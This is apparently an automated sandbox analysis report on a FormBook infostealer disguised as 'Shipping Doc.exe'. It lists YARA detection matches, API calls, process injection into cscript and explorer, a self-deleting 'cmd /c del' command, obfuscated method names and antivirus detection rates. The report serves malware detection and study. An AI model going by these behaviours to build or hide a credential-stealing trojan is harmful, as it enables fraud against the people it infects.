Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/argeg
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/d
Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/en-u
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/en-ut
Source: Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/fr-f
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/n
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/q
Source: Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/siv
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/vam&
Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coma7
Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comiv
Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.comc
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Shipping Doc.exe, 00000002.00000003.214716683.000000000579B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comI
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00419D60 NtCreateFile,	4_2_00419D60
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00419E10 NtReadFile,	4_2_00419E10
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00419E90 NtClose,	4_2_00419E90
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00419F40 NtAllocateVirtualMemory,	4_2_00419F40
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00419D5B NtCreateFile,	4_2_00419D5B
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00419E8B NtClose,	4_2_00419E8B
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00419F3A NtAllocateVirtualMemory,	4_2_00419F3A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_053D9910
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9540 NtReadFile,LdrInitializeThunk,	15_2_053D9540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D99A0 NtCreateSection,LdrInitializeThunk,	15_2_053D99A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D95D0 NtClose,LdrInitializeThunk,	15_2_053D95D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9860 NtQuerySystemInformation,LdrInitializeThunk,	15_2_053D9860
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9840 NtDelayExecution,LdrInitializeThunk,	15_2_053D9840
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9710 NtQueryInformationToken,LdrInitializeThunk,	15_2_053D9710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9780 NtMapViewOfSection,LdrInitializeThunk,	15_2_053D9780
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9FE0 NtCreateMutant,LdrInitializeThunk,	15_2_053D9FE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_053D9660
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9650 NtQueryValueKey,LdrInitializeThunk,	15_2_053D9650
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9A50 NtCreateFile,LdrInitializeThunk,	15_2_053D9A50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_053D96E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D96D0 NtCreateKey,LdrInitializeThunk,	15_2_053D96D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053DAD30 NtSetContextThread,	15_2_053DAD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9520 NtWaitForSingleObject,	15_2_053D9520
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9560 NtWriteFile,	15_2_053D9560
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9950 NtQueueApcThread,	15_2_053D9950
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D95F0 NtQueryInformationFile,	15_2_053D95F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D99D0 NtCreateProcessEx,	15_2_053D99D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9820 NtEnumerateKey,	15_2_053D9820
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053DB040 NtSuspendThread,	15_2_053DB040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D98A0 NtWriteVirtualMemory,	15_2_053D98A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D98F0 NtReadVirtualMemory,	15_2_053D98F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9730 NtQueryVirtualMemory,	15_2_053D9730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053DA710 NtOpenProcessToken,	15_2_053DA710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9B00 NtSetValueKey,	15_2_053D9B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9770 NtSetInformationFile,	15_2_053D9770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053DA770 NtOpenThread,	15_2_053DA770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9760 NtOpenProcess,	15_2_053D9760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053DA3B0 NtGetContextThread,	15_2_053DA3B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D97A0 NtUnmapViewOfSection,	15_2_053D97A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9A20 NtResumeThread,	15_2_053D9A20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9610 NtEnumerateValueKey,	15_2_053D9610
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9A10 NtQuerySection,	15_2_053D9A10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9A00 NtProtectVirtualMemory,	15_2_053D9A00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9670 NtQueryInformationProcess,	15_2_053D9670
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D9A80 NtOpenDirectoryObject,	15_2_053D9A80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03219F40 NtAllocateVirtualMemory,	15_2_03219F40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03219E10 NtReadFile,	15_2_03219E10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03219E90 NtClose,	15_2_03219E90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03219D60 NtCreateFile,	15_2_03219D60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03219F3A NtAllocateVirtualMemory,	15_2_03219F3A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03219E8B NtClose,	15_2_03219E8B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03219D5B NtCreateFile,	15_2_03219D5B

Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00417164	4_2_00417164
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_0041E1B3	4_2_0041E1B3
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_0041DAB4	4_2_0041DAB4
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_0041D360	4_2_0041D360
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00409E40	4_2_00409E40
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05461D55	15_2_05461D55
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05390D20	15_2_05390D20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B4120	15_2_053B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539F900	15_2_0539F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AD5E0	15_2_053AD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A841F	15_2_053A841F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451002	15_2_05451002
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AB090	15_2_053AB090
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CEBB0	15_2_053CEBB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B6E30	15_2_053B6E30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0321DAB4	15_2_0321DAB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03217164	15_2_03217164
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0321E1B3	15_2_0321E1B3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03202FB0	15_2_03202FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03209E40	15_2_03209E40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03202D87	15_2_03202D87
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03202D90	15_2_03202D90

Source: C:\Windows\SysWOW64\cscript.exe

Code function: String function: 0539B150 appears 32 times

Source: Shipping Doc.exe, 00000002.00000000.210709159.00000000004B0000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
Source: Shipping Doc.exe, 00000004.00000002.320202534.0000000000F90000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
Source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs Shipping Doc.exe
Source: Shipping Doc.exe, 00000004.00000002.320852896.0000000001C0F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping Doc.exe
Source: Shipping Doc.exe	Binary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe

Source: Shipping Doc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@2/2

Source: C:\Users\user\Desktop\Shipping Doc.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Doc.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01

Source: Shipping Doc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Shipping Doc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Doc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Shipping Doc.exe	Virustotal: Detection: 50%
Source: Shipping Doc.exe	Metadefender: Detection: 31%
Source: Shipping Doc.exe	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\Shipping Doc.exe 'C:\Users\user\Desktop\Shipping Doc.exe'
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Doc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Shipping Doc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Shipping Doc.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cscript.pdbUGP source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe
Source:	Binary string: cscript.pdb source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp

Source: Shipping Doc.exe

Static PE information: 0xAAC44811 [Thu Oct 14 14:37:05 2060 UTC]

Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_00414A19 push ebp; ret	4_2_00414A1C
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_004046A7 push edx; ret	4_2_004046AC
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_0041CEB5 push eax; ret	4_2_0041CF08
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_0041CF6C push eax; ret	4_2_0041CF72
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_0041CF02 push eax; ret	4_2_0041CF08
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_0041CF0B push eax; ret	4_2_0041CF72
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4_2_004167BF push ecx; iretd	4_2_004167C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053ED0D1 push ecx; ret	15_2_053ED0E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03214A19 push ebp; ret	15_2_03214A1C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0321CF02 push eax; ret	15_2_0321CF08
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0321CF0B push eax; ret	15_2_0321CF72
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0321CF6C push eax; ret	15_2_0321CF72
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_032167BF push ecx; iretd	15_2_032167C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_03214F99 pushfd ; retf	15_2_03214F9A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_032046A7 push edx; ret	15_2_032046AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0321CEB5 push eax; ret	15_2_0321CF08

Source: initial sample

Static PE information: section name: .text entropy: 7.2014231354

Source: Shipping Doc.exe, jtOONAqGyrOQ0u8Ixk/bpT4mwco1CD693b7CN.cs	High entropy of concatenated method names: '.cctor', '.ctor', '.ctor', 'oPOobRO5Vf', 'xm0o4Sf5NR', 'iEhoUBHjQn', 'ijuoVsDDg2', 'MQ3opPNGI1', 'S3PoaRe2Zm', 'nWyo9cofXu'
Source: Shipping Doc.exe, RuGDW7WIWRL3vuqXmw/WrIPZ8OGPrQJVhLUng.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'rgxUTfEcE8', 'q8OZlL4Rke', 'x5iZK8bkZ8', 'G2oZhTFUiy', 'L68ZzSd862', 'V2KO3o6ooX', 'cAnOXHn0FW', 'wSEOMWMK2K'
Source: Shipping Doc.exe, hasvvCPjjpwAYaryty/EfFkrBZD9T3RSksP6r.cs	High entropy of concatenated method names: 'Rj7pMjk0RG', 'yxxppukx53', '.ctor', 'uJxMm4pXjR', 'k9lMjtoI45', 'wSjM2XIjCC', 'gO5MrDyTRD', 'KrXMRRV4g5', 'uydM6uLlM6', 'YGpMTXkEhk'
Source: Shipping Doc.exe, QSqf1GDneX5foweMTs/gdXQIRHg06sMXH3Uxd.cs	High entropy of concatenated method names: '.ctor', 'OFPUt83v9K', 'Dispose', 'mCOUJCTXYL', 'upBUseu0pH', 'HIXUhn1Ejd', 'I30U81QHfg', 'StGUGWc16P', 'X1iUOqmHqd', 'Ka0ZQEPwNI'
